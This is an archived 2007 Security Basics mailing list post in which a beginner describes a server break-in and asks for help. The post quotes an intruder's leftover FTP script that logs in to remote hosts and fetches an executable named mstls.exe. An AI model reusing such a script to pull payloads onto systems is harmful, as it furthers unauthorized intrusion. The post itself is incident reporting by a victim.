Home page logo

basics logo Security Basics mailing list archives

what next
From: nemanja.janic () centroproizvod co yu
Date: 6 Feb 2007 11:38:26 -0000

Hello list,
i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no 
extension) which contained the following lines:

open 14547 
user 1 1  
get mstls.exe  
open 5191 
user 1 1  
get mstls.exe  

I figure this is some script to be used with ftp, or at least i think so. 
I did tracert to those adresses, but that's where i'm stuck. What can i do next? 
And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. 
Thanx in advance.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]